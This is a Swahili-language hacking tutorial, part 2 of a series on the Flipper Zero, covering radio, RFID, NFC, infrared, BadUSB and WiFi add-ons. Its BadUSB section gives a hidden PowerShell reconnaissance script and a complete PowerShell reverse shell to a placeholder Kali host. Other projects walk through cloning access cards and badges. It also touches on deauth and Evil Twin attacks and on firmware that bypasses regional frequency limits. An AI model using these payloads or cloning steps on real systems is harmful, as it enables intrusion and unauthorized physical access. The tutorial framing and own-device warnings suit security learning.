Njia ya Hacker: Mfululizo wa Sehemu 5
Sehemu ya 1: Utangulizi → Sehemu ya 2: Umahiri wa Flipper → Sehemu ya 3: Misingi ya Kali → Sehemu ya 4: Unyonyaji → Sehemu ya 5: Ukaguzi Kamili
Katika Sehemu ya 1, ulifanya hatua zako za kwanza. Ulinakili rimoti za IR, ukaskani kadi za NFC, ukaangalia spektramu ya sub-GHz ikiangazwa, na ukaandika "Hello World" kwa BadUSB. Uliona kwamba usalama mara nyingi ni udanganyifu tu.
Sasa tunaingia kwa undani. Kufikia mwisho wa makala hii, utaelewa kila protokali kuu ambayo Flipper Zero yako inaweza kuingiliana nayo. Si tu jinsi ya kuzitumia, bali kwa nini zinafanya kazi jinsi zinavyofanya na maana yake kwa usalama.
Onyo la haki: Utagundua kwamba mambo kadhaa uliyodhani ni salama... si salama.
Falsafa ya Flipper
Kabla ya kuingia kwenye protokali, tuweke mtazamo sahihi. Flipper Zero si "kifaa cha hacking" kwa maana ya Hollywood. Ni chombo cha kujifunza kinachokuruhusu kuingiliana na masafa ya redio na protokali za vifaa ambavyo kawaida havionekani.
Fikiria kama kioo cha kukuza kwa ishara za wireless. Ishara zilikuwa pale kila wakati. Hukuweza kuziona tu. Sasa unaweza.
Tofauti hii ni muhimu kwa sababu inabadilisha jinsi unavyokaribia usalama. "Usalama" wengi unategemea kufichwa, dhana kwamba washambuliaji hawatajua jinsi ya kuingiliana na mfumo. Flipper yako inaondoa kufichwa huko. Inakuonyesha kwa usahihi kile kinachotumwa na kupokelewa. Na mara tu unapoweza kuona, unaweza kutathmini kama usalama wa kweli upo.
Habari za ndani: Mara nyingi, usalama wa kweli haupo.
⚠️ Kumbusho: Vifaa Vyako Tu
Kila kitu katika makala hii ni kwa ajili ya kupima vifaa, kadi, na mifumo YAKO MWENYEWE. Mbinu hizi zinafanya kazi kwenye vitu vya mtu yeyote, hiyo ndiyo hoja. Lakini kuzitumia kwenye mifumo usiyomiliki ni kinyume cha sheria. Pima usalama wako mwenyewe. Gundua udhaifu wako mwenyewe. Hiyo ndiyo njia.
Sub-GHz: Spektramu Isiyoonekana
Masafa ya redio chini ya gigahertz yako kila mahali. Mlango wako wa gereji, kipini cha ufunguo wa gari, kituo cha hali ya hewa, kengele ya mlango isiyo na waya, sensori za shinikizo la matairi, vifaa vya nyumba mahiri. Vyote vinatuma kila wakati katika bendi za masafa chini ya 1 GHz.
Kwa nini sub-GHz? Masafa ya chini yanasafiri mbali zaidi na kupenyeza kuta vizuri zaidi kuliko masafa ya juu kama WiFi (2.4/5 GHz). Hii inazifanya kuwa kamili kwa vifaa vinavyohitaji mawasiliano ya kuaminika kwa umbali bila mahitaji ya mstari wa kuona.
Mandhari ya Masafa
Mikoa tofauti inatumia masafa tofauti kwa sababu ya kanuni:
- 315 MHz: Amerika Kaskazini. Milango ya gereji ya zamani, vipini vya funguo za gari
- 390 MHz: Amerika Kaskazini. Milango ya gereji, magari mengine
- 433.92 MHz: Ulimwenguni kote. Vituo vya hali ya hewa, sensori, vifaa vya Ulaya, bidhaa nyingi za IoT
- 868 MHz: Ulaya. Nyumba mahiri, LoRa, mita za huduma
- 915 MHz: Marekani. LoRa, nyumba mahiri, viwandani
Kwa firmware ya Momentum, Flipper yako inaweza kutuma na kupokea katika bendi zote hizi bila kujali eneo lako halisi. Firmware ya kawaida inakuzuia kwenye masafa ya kisheria ya mkoa wako. Hii ni muhimu kwa kujifunza kwa sababu unaweza kuwa na vifaa vinavyofanya kazi kwenye masafa ya "kigeni."
Mradi: Changanua Mlango Wako wa Gereji
Muda: Dakika 15
Utajifunza nini: Tofauti kati ya misimbo tuli na misimbo inayozunguka, na kwa nini ni muhimu
Hatua:
- Nenda kwenye Sub-GHz → Read
- Simama karibu na gereji yako (si karibu sana hadi mlango ufunguke)
- Bonyeza kitufe cha rimoti ya mlango wa gereji
- Angalia Flipper ikipokea ishara
- Chunguza kilichopokelewa, angalia protokali iliyotambuliwa
Unaweza kuona nini:
- Princeton, Linear, Chamberlain (ya zamani): Misimbo tuli. Msimbo uleule unatumwa kila wakati. Inaathiriwa na mashambulizi ya kurudia.
- KeeLoq, Security+ 2.0, Rolling Code: Misimbo inayozunguka. Kila utumaji hutumia msimbo tofauti kutoka mfuatano uliobadilishwa. Haiwezi kurudiwa kwa urahisi.
Ukweli: Ikiwa mlango wako wa gereji unatumia msimbo tuli (mengi yaliyowekwa kabla ya ~2015 yanafanya hivyo), mtu yeyote anayepokea ishara hiyo mara moja anaweza kuirudia milele. Gereji yako inalindwa na dhana kwamba hakuna mtu anayesikiliza. Dhana hiyo imevunjika sasa hivi.
Misimbo Inayozunguka Imeelezwa
Milango ya gereji ya kisasa na vipini vya funguo za gari hutumia misimbo inayozunguka (pia inaitwa misimbo ya kuruka). Jinsi inavyofanya kazi:
- Mtumaji (rimoti yako) na mpokeaji (gereji yako) wanashiriki mbegu ya siri na algorithm
- Kila bonyezo la kitufe linazalisha msimbo unaofuata katika mfuatano uliosawazishwa
- Mpokeaji anakubali msimbo wa sasa AU yeyote kati ya misimbo ~256 inayofuata (kushughulikia mabonyezo nje ya masafa)
- Mara msimbo unapotumika, unabatilishwa milele
Hii inamaanisha kupokea na kurudia ishara ya msimbo unaozunguka haifanyi kazi. Wakati unapoirudia, msimbo tayari umebatilishwa.
Kwa Nini Hii ni Muhimu
Misimbo inayozunguka ilivumbuliwa kwa sababu ulimwengu wa sub-GHz uligundua kwamba usalama kupitia kufichwa haufanyi kazi. Mtu fulani aligundua jinsi ya kupokea na kurudia ishara, kwa hivyo tasnia ililazimika kutekeleza usalama wa kweli wa kriptografia. Muundo huu unarudiwa katika kila protokali tutakayojadili: usalama unaongezwa tu baada ya mtu kuonyesha udhaifu.
Mradi: Pokea Data ya Kituo cha Hali ya Hewa
Muda: Dakika 10
Utajifunza nini: Ni data ngapi inayotangazwa bila ulinzi wowote
Hatua:
- Nenda kwenye Sub-GHz → Read
- Subiri karibu na sensori yoyote ya hali ya hewa isiyo na waya (kipimajoto cha nje, kipimamvua, n.k.)
- Nyingi hutuma kila sekunde 30-60
- Pokea utumaji
- Angalia protokali na data yoyote iliyoondolewa msimbo
Utapata nini: Joto, unyevu, hali ya betri, kitambulisho cha sensori. Yote yanatumwa kwa maandishi wazi. Bila usimbuaji, bila uthibitishaji. Mpokeaji yeyote uliorekebishwa kwenye masafa hayo anapata data yote. Sasa fikiria ni nini kingine kinachotangaza katika jirani yako...
RFID: Ulimwengu wa 125kHz
RFID ya masafa ya chini (125kHz) ni teknolojia ya zamani na rahisi zaidi ya kadi za ukaribu. Utaipata katika kadi za usajili wa gym, kadi za ufikiaji wa majengo ya ofisi za zamani, gereji za maegesho, na mifumo ya kuingia ya makazi.
Na usalama wake ni mbaya karibu kote.
Jinsi RFID ya 125kHz Inavyofanya Kazi
Kadi hizi ni passive, hazina betri. Unaposhika moja karibu na kisomaji, uwanja wa umeme wa kisomaji unalisha kadi, na kadi inatuma nambari yake ya kitambulisho. Hiyo tu. Hakuna changamoto-majibu. Hakuna usimbuaji. Tu: "Mimi ni kadi nambari 12345."
Kisomaji kinasema "sawa" na kutoa ufikiaji kwa msingi wa kujua nambari hiyo ya kitambulisho tu.
Unaona tatizo.
Aina za Kawaida za Kadi za 125kHz
- EM4100: Inayopatikana sana. Inatangaza tu kitambulisho cha biti 40. Usalama sifuri.
- HID Prox: Kadi ya kawaida zaidi ya ufikiaji wa kampuni. Inatangaza msimbo wa kituo + nambari ya kadi. Usalama sifuri.
- Indala: Si ya kawaida sana. Usimbaji tofauti lakini tatizo lile lile, hakuna usalama.
- AWID: Toleo lingine. Udhaifu ule ule wa msingi.
Umegundua muundo? Kadi hizi zote zinatangaza tu kitambulisho. "Usalama" ni kwamba mtu atahitaji vifaa maalum kusoma kitambulisho hicho. Flipper yako ni vifaa hivyo.
Mradi: Nakili Kadi Yako ya Gym
Muda: Dakika 5
Unahitaji nini: Kadi yako ya gym/bwawa/makazi ya 125kHz, kadi tupu ya T5577 ($1-2 kila moja)
Hatua:
- Nenda kwenye 125 kHz RFID → Read
- Shika kadi yako dhidi ya nyuma ya Flipper (ambapo antenna ya RFID iko)
- Subiri usomaji wenye mafanikio. Angalia aina ya kadi na kitambulisho
- Hifadhi kadi kwa jina linalotambulika
- Kupima uigaji: Saved → Select Card → Emulate
- Shika Flipper kwenye kisomaji cha gym yako. Inapaswa kufanya kazi sawa na kadi yako
Kuandika kwenye T5577 tupu:
- Nenda kwenye kadi yako iliyohifadhiwa
- Chagua Write
- Shika kadi tupu ya T5577 kwenye Flipper
- Subiri uthibitisho wa kuandika
- Sasa una nakala halisi
Kwa nini hii ni muhimu: Mfano mzima wa usalama wa mfumo huo wa kudhibiti ufikiaji umeanguka sasa hivi. Mtu yeyote anayeweza kukaribia kadi yako kwa sekunde mbili anaweza kuinakili. Fikiria kuhusu hilo wakati unapocha mfuko wako kwenye chumba cha kubadilishia nguo cha gym.
T5577: Kadi Yako ya Kichawi
T5577 ni kadi ya RFID inayoweza kuandikwa upya ambayo inaweza kuiga aina nyingi za kadi za 125kHz. Ni kama CD-R tupu kwa kadi za ufikiaji. Unaweza kuandika data ya kadi yoyote juu yake, na inakuwa kadi hiyo.
Nunua pakiti ya 10 kwa majaribio. Ni za bei nafuu na za kusaidia sana kuelewa jinsi teknolojia hii yote ilivyo dhaifu. Unaweza kuandika data ya kadi moja, kuipima, kisha kuandika data ya kadi tofauti. Zote kwenye kadi moja ya kimwili.
Hii Inafichua Nini
"Usalama" wa RFID ya 125kHz ni mchezo wa kuigiza tu. Mifumo hii inadhania huwezi kusoma kadi, huwezi kunakili data, na huwezi kuiandika kwenye kadi nyingine. Dhana zote tatu ni za uwongo kwa vifaa vya watumiaji. Ikiwa mahali pako pa kazi kunatumia kadi za HID Prox (kadi ya kawaida zaidi ya ufikiaji wa kampuni), mfanyakazi yeyote mwenye Flipper anaweza kunakili ufikiaji wa mfanyakazi mwingine yeyote. Acha hilo likae.
Jambo Muhimu
Usalama wa RFID ya 125kHz ni mchezo wa kuigiza tu. Mifumo hii inadhania huwezi kusoma, kunakili, au kuandika upya data ya kadi. Dhana zote tatu ni za uwongo kwa vifaa vya watumiaji vinavyogharimu chini ya $200.
NFC: Ulimwengu wa 13.56MHz
NFC ya masafa ya juu (13.56 MHz) ni kizazi kipya zaidi. Inasaidia malipo bila kugusa, kadi za ufikiaji za kisasa, mifumo ya usafiri, funguo za hoteli, na malipo ya kugusa ya simu yako.
Habari njema: Kadi zingine za NFC kwa kweli zina usalama wa kweli.
Habari mbaya: Nyingi hazina.
Aina za Kadi za NFC
- MIFARE Classic: Inapatikana sana katika kadi za ufikiaji, usafiri, hoteli. Inatumia usimbuaji wa umiliki ambao ulivunjwa miaka iliyopita. Inaathiriwa.
- MIFARE Ultralight: Kadi rahisi zenye usalama mdogo. Mara nyingi hutumiwa kwa tiketi za usafiri za kutumia-na-kutupa.
- NTAG: Kawaida katika tagi za NFC kwa otomatiki. Kawaida usalama mdogo.
- MIFARE DESFire: Salama kwa kweli. Inatumia usimbuaji wa AES. Inatumika katika uwekaji wa usalama wa juu wa hivi karibuni.
- EMV (Kadi za Malipo): Kadi yako ya mkopo. Ina usimbuaji mkali, vikomo vya shughuli, na kugundua udanganyifu.
Mradi: Changanua Kitambulisho Chako cha Kazi
Muda: Dakika 10
Utajifunza nini: Kama mahali pako pa kazi kuna usalama wa kweli au mchezo wa kuigiza wa usalama
Hatua:
- Nenda kwenye NFC → Read
- Shika kitambulisho chako cha kazi dhidi ya nyuma ya Flipper
- Subiri usomaji kukamilika
- Chunguza kinachokuonyesha Flipper
Kuelewa matokeo:
- MIFARE Classic 1K/4K: Kitambulisho chako kinatumia usimbuaji uliovunjwa. Kwa muda na zana sahihi, kinaweza kunakiliwa.
- MIFARE Ultralight: Usalama mdogo. Mara nyingi inaweza kunakiliwa.
- MIFARE DESFire: Salama kwa kweli. Utaona data chache.
- Unknown/Locked: Inaweza kuwa ya umiliki au DESFire. Uchunguzi zaidi unahitajika.
Ukweli halisi: Vitambulisho vingi vya kampuni bado ni MIFARE Classic. Usimbuaji ulivunjwa hadharani mwaka 2008. Miaka kumi na nane iliyopita. Ikiwa kitambulisho chako kinasema MIFARE Classic, mwajiri wako anaendesha mfumo wa usalama ambao wataalamu wa kriptografia wanaona ni wa kuchekeshwa.
Kunakili UID dhidi ya Kunakili Kamili
Tofauti muhimu: Flipper inaweza kila wakati kusoma na kuiga UID (Unique Identifier) ya kadi, nambari ya serial. Mifumo mingine ya ufikiaji inakagua UID tu. Kwa mifumo hii, uigaji rahisi unafanya kazi.
Mifumo bora zaidi inakagua UID NA data iliyosimbwa iliyohifadhiwa kwenye kadi. Kwa hizi, utahitaji pia kunakili sekta zilizosimbwa. Inawezekana kwa MIFARE Classic (usimbuaji umevunjwa) lakini si kwa DESFire.
Mradi: Uchambuzi wa Kadi ya Ufunguo wa Hoteli
Muda: Dakika 5 (wakati mwingine utakapokuwa hotelini)
Utajifunza nini: Jinsi usalama wa hoteli unavyofanya kazi kwa kweli
Hatua:
- Soma kadi yako ya ufunguo wa hoteli kwa NFC → Read
- Angalia aina ya kadi
- Angalia data gani inayoweza kusomwa
Utapata nini kwa kawaida: Funguo nyingi za hoteli ni MIFARE Ultralight au Classic. Zingine zinaonyesha nambari ya chumba, tarehe ya kutoka, au metadata nyingine katika sekta zinazosomeka. "Usalama" ni kwamba wageni kwa kawaida hawana visomaji vya NFC. Sasa wewe una.
Kadi za Kichawi kwa NFC
Kama T5577 kwa 125kHz, kuna kadi za NFC za "kichawi" kwa 13.56MHz:
- Gen1 (UID Inayobadilika): Inaweza kuandika UID maalum. Inagundulika na visomaji vingine kama "ya kichawi."
- Gen2 (CUID): Utangamano bora. Mabadiliko ya UID yanabaki baada ya kuzima.
- Gen3 (UFUID): Inaweza kufunga UID baada ya kuandika. Inaonekana kama kadi ya kawaida.
- Gen4 (Ultimate Magic): Yenye kubadilika zaidi. Inaweza kuiga aina nyingi za kadi.
Kwa kujifunza, kadi za Gen2 ni chaguo bora zaidi. Bei nafuu, zinaoana sana, na za kutosha kwa majaribio mengi.
Infrared: Udhibiti Kamili
Tayari uliunda rimoti za IR katika Sehemu ya 1. Tuingie kwa undani zaidi.
Kujenga Maktaba Kamili ya Rimoti
Flipper inaweza kuhifadhi rimoti za IR zisizo na kikomo. Lakini kujifunza kila kitufe kimoja kimoja ni kuchosha. Njia bora: tumia hifadhidata za jamii.
Firmware ya Momentum inajumuisha IRDB, hifadhidata kubwa ya rimoti zilizorekodiwa mapema. Unaweza pia kupakua rimoti kutoka hazina za GitHub na kuziongeza kwenye kadi ya SD ya Flipper.
Mradi: Jenga Arsenal Yako ya IR
Muda: Dakika 20
Hatua:
- Kwenye Flipper yako: Infrared → Universal Remotes
- Utapata rimoti za jumla zilizojengwa awali kwa TV, AC, projekta, n.k.
- Zipime dhidi ya vifaa vyako
- Kwa vifaa visivyofunikwa, tumia Learn New Remote
- Panga rimoti zilizohifadhiwa kwa chumba au aina ya kifaa
Hatua ya juu: Unda "rimoti za chumba" zinazochanganya vifaa vyote vya IR katika nafasi moja. Faili moja inadhibiti TV, sauti bar, taa, na AC.
Unajifunza nini: IR ni ya ulimwengu na haijalindwa. Kifaa chochote chenye kipokezi cha IR kinaweza kudhibitiwa na kifaa chochote chenye kitumaji cha IR. Hii ni ya makusudi. IR iliundwa kwa urahisi, si usalama. Flipper yako inafanya urahisi huo kuwa wa ulimwengu.
Kupokea IR Raw
Vifaa vingine vinatumia protokali za IR zisizo za kawaida. Kwa hivi, Flipper inaweza kupokea ishara ya raw, muda sahihi wa mapigo ya washa/zima, na kuirudia kwa usahihi.
Nenda kwenye Infrared → Learn New → Raw wakati kujifunza kwa kawaida hakutambui ishara.
BadUSB: Mbadala wa Rubber Ducky
Katika Sehemu ya 1, ulifanya Flipper iandike "Hello World." Sasa tunakuwa wa dhati.
BadUSB (pia inajulikana kama mashambulizi ya USB Rubber Ducky) inatumia kasoro ya msingi katika jinsi kompyuta zinavyoshughulikia vifaa vya USB: zinaamini kibodi bila masharti. Unapounganisha kifaa kinachojidai kuwa kibodi, kompyuta inakubali kila herufi bila swali.
Flipper yako inaweza kuandika takriban herufi 1,000 kwa sekunde. Haraka zaidi kuliko binadamu yeyote. Haraka ya kutosha kutekeleza mashambulizi magumu kabla ya mtu yeyote kuweza kuitikia.
Misingi ya DuckyScript
Mzigo wa BadUSB unatumia DuckyScript, lugha rahisi ya scripting. Amri muhimu:
REM This is a comment
DELAY 1000
STRING Hello World
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPEMradi: Mkusanyaji wa Taarifa za Mfumo
Muda: Dakika 15
Inafanya nini: Inafungua PowerShell, inakusanya taarifa za mfumo, inahifadhi kwenye faili (kwenye kompyuta YAKO)
REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTERUnajifunza nini: Kwa chini ya sekunde 3 za ufikiaji wa kimwili, mshambuliaji anaweza kukusanya jina la mwenyeji, jina la mtumiaji, kikoa, anwani za IP, na toleo la OS. Hii ni upelelezi. Fikiria ni nini kingine kinachoweza kuandikwa katika sekunde hizo 3.
Mradi: Usanidi wa Shell ya Kurudisha
Muda: Dakika 30 (pamoja na usanidi wa Kali)
Inafanya nini: Inaunda muunganisho wa kurudi kwenye mashine yako ya Kali (maandalizi ya Sehemu ya 3)
Mahitaji: Kali Linux inafanya kazi (VM ni sawa), ujue anwani ya IP ya Kali yako
Kwenye Kali, anza msikilizaji:
nc -lvnp 4444
Mzigo wa BadUSB (lengo la Windows):
REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTERKinachotokea: Mashine lengwa inafungua muunganisho wa PowerShell kurudi kwenye sanduku lako la Kali. Sasa una ufikiaji wa mstari wa amri kwenye mashine hiyo. Hii ndiyo msingi wa jinsi ufikiaji wa kimwili + BadUSB = kuathiriwa kamili. Tutachunguza zaidi katika Sehemu ya 3.
⚠️ Mizigo Hii ni Halisi
Mzigo wa shell ya kurudisha hapo juu unafanya kazi kwa kweli. Uitumie TU kwenye mashine unazomiliki kwa majaribio. Kuiendesha kwenye mashine ya mtu mwingine ni uhalifu wa shirikisho (ufikiaji usioruhusiwa + uwekaji wa mlango wa nyuma). Lengo ni kuelewa tishio, si kulitengeneza.
Mizigo ya Kufurahisha kwa Maonyesho
Kwa kuonyesha BadUSB kwa watu wengine (kwenye mashine yao kwa ruhusa), hapa kuna mizigo isiyo na madhara lakini ya kuvutia:
REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTERREM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROWGPIO: Upanuzi wa Vifaa
Pini za GPIO (General Purpose Input/Output) za Flipper zinakuruhusu kuunganisha moduli za nje na kupanua uwezo. Hapa ndipo Flipper inabadilika kutoka chombo cha mkononi hadi jukwaa la maendeleo.
Moduli Lazima
- WiFi Dev Board: Inaongeza uwezo wa WiFi: kupokea pakiti, majaribio ya deauth, mashambulizi ya Evil Twin. Muhimu kwa Sehemu ya 3 na kuendelea.
- Antenna ya Nje ya CC1101: Inapanua kwa kiasi kikubwa masafa ya Sub-GHz. Antenna ya ndani inafanya kazi, lakini ya nje ni bora kwa kazi kubwa.
- ESP32 Marauder: Inabadilisha Flipper kuwa jukwaa la hacking la WiFi/Bluetooth. Inapokea handshake, inaendesha mashambulizi.
- ProtoBoard: Kwa miradi maalum na kuunganisha vifaa vyako mwenyewe.
Mradi: Usanidi wa WiFi Dev Board
Muda: Dakika 20
Unahitaji nini: WiFi Dev Board (rasmi au ESP32 inayooana)
Hatua:
- Flash firmware ya Marauder kwenye ESP32 (maelekezo kwenye github.com/justcallmekoko/ESP32Marauder)
- Unganisha kwenye pini za GPIO za Flipper
- Nenda kwenye GPIO → ESP32 → Marauder
- Sasa una skani ya WiFi, deauth, na kupokea pakiti
Kwa nini hii ni muhimu: Flipper peke yake haiwezi kufanya WiFi, haina vifaa sahihi vya redio. Lakini na dev board, unaweza kuskani mitandao, kupokea WPA handshake, na kutekeleza mashambulizi ya WiFi. Tutatumia hii sana katika Sehemu ya 3 na 4.
Vipengele vya Juu vya Momentum
Ikiwa unaendesha firmware ya Momentum (unapaswa kuwa), hapa kuna vipengele vinavyostahili kuchunguza:
- Picha za Desktop: Kwa mapambo tu, lakini za kufurahisha. Angalia pakiti za picha za jamii.
- Protokali Zilizopanuliwa: Momentum inaongeza msaada kwa protokali ambazo firmware ya kawaida haijumuishi.
- Kituo cha Programu: Programu za ziada zaidi ya kawaida: michezo, zana, huduma maalum.
- Pakiti za Mali Maalum: Badilisha muonekano na hisia nzima.
Thamani halisi iko katika masafa yaliyofunguliwa na msaada uliopanuliwa wa protokali. Firmware ya kawaida imezuiliwa kwa makusudi kwa kufuata sheria na kanuni. Momentum inadhani wewe ni mtu mzima anayeelewa sheria.
Umejifunza Nini
Sasa unaelewa:
- Sub-GHz: Jinsi milango ya gereji, vipini vya funguo za gari, na sensori zinavyowasiliana, na kwa nini misimbo inayozunguka ni muhimu
- RFID ya 125kHz: Kwa nini kadi za gym na vitambulisho vya zamani vinaweza kunakiliwa kwa urahisi
- NFC ya 13.56MHz: Tofauti kati ya usimbuaji uliovunjwa (MIFARE Classic) na usalama wa kweli (DESFire)
- Infrared: Jinsi ya kujenga maktaba ya rimoti za ulimwengu na kupokea ishara za raw
- BadUSB: Kwa nini uaminifu wa USB HID ni udhaifu wa msingi, na jinsi ya kuutumia
- GPIO: Jinsi ya kupanua hadi WiFi, masafa yaliyopanuliwa, na vifaa maalum
Flipper yako sasa ni silaha. Lakini ni bisibisi ikilinganishwa na Kali Linux, ambayo ni warsha nzima. Wakati wa kuanzisha mazingira halisi ya hacking.
Njia ya Hacker
Mfululizo wa sehemu 5 unaokupeleka kutoka udadisi hadi uwezo.
Sehemu ya 1: Utangulizi Sehemu ya 2: Umahiri wa Flipper ✓ Sehemu ya 3: Misingi ya Kali Sehemu ya 4: Unyonyaji Sehemu ya 5: Ukaguzi Kamili
Orodha ya Ukaguzi ya Sehemu ya 2
☐ Sub-GHz: Mlango wa gereji umechambuliwa, tofauti ya misimbo inayozunguka na tuli imeeleleweka
☐ RFID ya 125kHz: Kadi zimesomwa, angalau nakala moja imejaribiwa
☐ NFC: Kitambulisho cha kazi kimechambuliwa, aina ya kadi imetambuliwa
☐ Infrared: Maktaba kamili ya rimoti za nyumba imejengwa
☐ BadUSB: Mzigo wa taarifa za mfumo umejaribiwa, shell ya kurudisha imeeleleweka
☐ GPIO: WiFi dev board iko tayari kwa Sehemu ya 3
☐ Kadi za Kichawi: T5577 na/au kadi za kichawi za NFC zimenunuliwa kwa majaribio
Kinachofuata
Katika Sehemu ya 3, tunaondoka kwenye uwezo uliolenga wa Flipper na kuingia katika mazingira kamili ya majaribio ya kupenya: Kali Linux.
Utajifunza:
- Kusanidi maabara yako ya hacking (usakinishaji na usanidi wa VM)
- Upelelezi wa mtandao na nmap: ramani ya kila kifaa kwenye mtandao wako
- Upelelezi wa wireless: kupokea WiFi handshake na aircrack-ng
- Upelelezi wa wavuti: kugundua kile ambacho router yako inafichua
- Kuunganisha data za Flipper na mtiririko wa kazi wa Kali
Flipper ilionyesha kwamba udhaifu upo. Kali inakusaidia kuelewa kwa usahihi jinsi unavyoenda kwa undani.
Tutaonana katika Sehemu ya 3.